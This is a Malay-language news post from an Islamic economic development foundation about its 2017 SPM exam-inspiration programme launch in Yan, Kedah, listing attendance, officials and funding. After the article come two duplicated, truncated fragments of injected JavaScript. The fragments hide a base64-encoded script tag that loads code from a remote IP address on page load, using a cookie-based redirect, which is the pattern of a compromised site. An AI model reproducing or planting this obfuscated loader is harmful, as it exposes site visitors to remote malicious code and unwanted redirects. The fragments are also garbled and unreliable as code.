YaPEIM » Majlis Perasmian Program Inspirasi SPM YaPEIM 2017 Peringkat Negeri Kedah

Terkini

Majlis Perasmian Program Inspirasi SPM YaPEIM 2017 Peringkat Negeri Kedah

YaPEIM memperuntukkan sejumlah RM3.7 juta untuk menjayakan Program Inspirasi SPM YaPEIM 2017 kepada 71,847 orang penerima manfaat di seluruh negara yang melibatkan sebanyak 152 PPD dan Daerah, 1,261 lokasi program dan 1,259 buah sekolah.

MAJLIS PERASMIAN PROGRAM INSPIRASI SPM YaPEIM 2017 PERINGKAT NEGERI KEDAH

TARIKH : 1 NOVEMBER 2017
LOKASI : SEKOLAH MENENGAH KEBANGSAAN AGAMA YAN, KEDAH
PPD : KUALA MUDA /YAN
JUMLAH PESERTA : 1725 ORANG
JUMLAH IBU BAPA/GURU PENGIRING : 558 ORANG
JUMLAH KESELURUHAN : 2,283 ORANG

YAN – 1 NOVEMBER 2017 – Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) hari ini menganjurkan Program Inspirasi SPM YaPEIM 2017 peringkat negeri Kedah di SMK Agama Yan yang melibatkan 2,283 orang yang hadir.

Program ini menggunakan pendekatan Strategi Lautan Biru Kebangsaan (NBOS) bersama Kementerian Pendidikan Malaysia, Utusan Malaysia, Felcra dan Yayasan Taqwa. Pemilihan peserta dibuat oleh pihak Jabatan Pendidikan Negeri melalui semua Pejabat Pendidikan Daerah(PPD).

Matlamat utama penganjuran program ini adalah bagi meningkatkan pencapaian akademik murid dalam Sijil Pelajaran Malaysia(SPM) terutama pelajar daripada kumpulan prestasi sederhana dan lemah, khususnya pelajar luar bandar.

Para pelajar akan diberi tip dan teknik menjawab soalan yang betul dengan bimbingan guru-guru pakar & cemerlang ke arah mencapai kejayaan yang lebih cemerlang.

Majlis dimulakan dengan Majlis Bacaan Yaasin Perdana yang diketuai oleh Ust. Noor Ismail Hj Omar , Penyelia Pendidikan Islam, Pejabat Pendidikan Daerah Kuala Muda/Yan.

Majlis telah dirasmikan oleh Y.B. Mejar Jeneral Dato’ Seri Jamil Khir Hj Baharom, Menteri di Jabatan Perdana Menteri.

Turut hadir ialah Dato’ Abibullah Hj Samsudin, Ketua Pengarah YaPEIM, Tn. Hj Mohamad Zaki Husin, Ketua Sektor Pendidikan Islam Jabatan Pendidikan Negeri Kedah, Tn. Syeikh Yusof Ahmad, Pegawai Agama Yan, guru-guru dan pemimpin masyarakat setempat.

Majlis diteruskan dengan Program Motivasi Restu Ilmu yang disampaikan oleh Tn. Syeikh Yusof Ahmad, Pegawai Agama Daerah Yan. Para Pelajar dan ibu bapa diberikan perangsang dan persediaan untuk menghadapi peperiksaan SPM.

YaPEIM memperuntukkan sejumlah RM3.7 juta untuk menjayakan Program Inspirasi SPM YaPEIM 2017 kepada 71,847 orang penerima manfaat di seluruh negara yang melibatkan sebanyak 152 PPD dan Daerah, 1,261 lokasi program dan 1,259 buah sekolah.

Untuk di Negeri Kedah, kos perbelanjaan untuk Program Inspirasi SPM YaPEIM 2017 ialah sebanyak RM279,000, yang meliputi 12 buah Pejabat Pendidikan Daerah(PPD) , 133 buah sekolah dan penerima manfaat sejumlah 6,800 orang peserta.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top